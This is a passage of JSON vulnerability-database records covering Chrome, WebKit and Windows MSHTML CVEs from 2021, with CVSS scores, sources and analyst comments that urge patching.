["CVE-2021-33742"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-33742", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:19:50", "description": "Apple iOS, iPadOS, and watchOS WebKit contains a cross-site scripting (XSS) vulnerability when processing maliciously crafted web content.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apple iOS, iPadOS, and watchOS Cross-Site Scripting (XSS) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1879", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-02T16:19:50", "description": "Google Chromium contains a race condition vulnerability in audio which allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability affects web browsers that utilize Chromium, including Google Chrome and Microsoft Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chromium Race Condition Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21166", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T07:02:04", "description": "chromium is vulnerable to privilege escalation. The vulnerability exists due to an unknown function of the component V8. The manipulation with an unknown input leads to a privilege escalation vulnerability\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-13T20:01:02", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T23:01:02", "id": "VERACODE:30949", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30949/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:23", "description": "chromium:sid is vulnerable to a denial-of-service vulnerability. An attacker can use a malicious HTTP page to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:07", "type": "veracode", "title": "Denial Of Service(DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-12-03T20:11:23", "id": "VERACODE:29632", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29632/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:41:17", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2023-10-07T00:00:00", "id": "AKB:732A3017-A62C-4347-9709-9B8790F47FA1", "href": "https://attackerkb.com/topics/V4ywqx3Gej/cve-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T11:39:19", "description": "This issue was addressed by improved management of object lifetimes. This issue is fixed in iOS 12.5.2, iOS 14.4.2 and iPadOS 14.4.2, watchOS 7.3.3. Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2021 4:05pm UTC reported:\n\nThis is an [actively exploited zero-day](<https://www.bleepingcomputer.com/news/security/apple-fixes-a-ios-zero-day-vulnerability-actively-used-in-attacks/>) in the WebKit browser engine affecting iPhone 6s and later models, as well as a slew of iPad models (and some Apple Watch versions, according to the Bleeping Computer article, though Apple\u2019s [characteristically sparse advisory](<https://support.apple.com/en-us/HT212256>) makes no mention of the watch). Discovered by Google\u2019s Threat Analysis Group, requires a user to open maliciously crafted web content. Update those iDevices, kids.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-1879", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2023-10-07T00:00:00", "id": "AKB:FF274F38-9A0C-47ED-97B9-57C114AB1511", "href": "https://attackerkb.com/topics/S4T9RGhUVO/cve-2021-1879", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-10-18T16:41:16", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at June 16, 2021 10:56pm UTC reported:\n\nWindows MSHTML Platform (Microsoft proprietary browser engine) enables RCE and is being actively exploited in limited campaigns. \n\uf0a7 Exploitation requires user interaction; thus, feasible threat scenarios include drive-by download, exploit kits, and phishing links. \n\uf0a7 A commercial exploit company reportedly provided the exploit code to Eastern European and Middle Eastern state-sponsored actors\n\n**gwillcox-r7** at June 17, 2021 5:25pm UTC reported:\n\nWindows MSHTML Platform (Microsoft proprietary browser engine) enables RCE and is being actively exploited in limited campaigns. \n\uf0a7 Exploitation requires user interaction; thus, feasible threat scenarios include drive-by download, exploit kits, and phishing links. \n\uf0a7 A commercial exploit company reportedly provided the exploit code to Eastern European and Middle Eastern state-sponsored actors\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-33742", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2023-10-07T00:00:00", "id": "AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "href": "https://attackerkb.com/topics/oLB20MCHnO/cve-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:44:11", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 08, 2021 5:47pm UTC reported:\n\nReported as exploited in the wild at <https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>.\n\nDetails are still scant on this vulnerability as they are being withheld by Google until more people have patched the issue, which was fixed in Chrome 89.0.4389.72. All that we know is that the bug is labeled as an `Object lifecycle issue in audio` and was found by `Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11`.\n\nGiven the description of this vulnerability as well as its link to a similar vulnerability exploited in the wild in the past (see <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>), its likely that this is a UAF vulnerability. Given the one used in <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/> was a bug in the same component which was then used in the WizardOpium attacks, its likely that this vulnerability will lead to full compromise of the system given past history.\n\nUsers are encouraged to disable JavaScript where possible, particularly for untrusted sites, as this is often needed in order to successfully exploit UAF vulnerabilities in the browser. However this is only a temporary fix, and it is strongly encouraged that users instead upgrade to Chrome 89.0.4389.72 or later, Given there is already active exploitation of this vulnerability, and given the history of bugs within this component, there is a good possibility that we may see more widespread exploitation of this issue in the near future.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2021-21166"], "modified": "2023-10-07T00:00:00", "id": "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "href": "https://attackerkb.com/topics/VffVzAAdhq/cve-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:44:09", "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual the advice to protect against UAF bugs in browsers is to disable JavaScript on untrusted websites via a plugin such as NoScript. Since most UAF\u2019s require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, a object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. Time will tell if this trend continues though, but it is interesting to see such an regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2023-10-07T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-01T06:07:29", "description": "# CVE-2021-30551\n\nMy exp for chrome V8...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-22T14:15:23", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-04-01T03:53:55", "id": "55D44407-F5C9-50A9-B51D-0D4F668CD993", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "debiancve": [{"lastseen": "2023-12-02T18:22:44", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "debiancve", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-15T22:15:00", "id": "DEBIANCVE:CVE-2021-30551", "href": "https://security-tracker.debian.org/tracker/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:43", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21166", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-02T15:09:05", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "cve", "title": "CVE-2021-30551", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2023-11-07T03:33:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-30551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T14:16:43", "description": "This issue was addressed by improved management of object lifetimes. This issue is fixed in iOS 12.5.2, iOS 14.4.2 and iPadOS 14.4.2, watchOS 7.3.3. Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-02T19:15:00", "type": "cve", "title": "CVE-2021-1879", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2021-1879", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1879", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-12-02T15:24:43", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-33742", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-"], "id": "CVE-2021-33742", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", 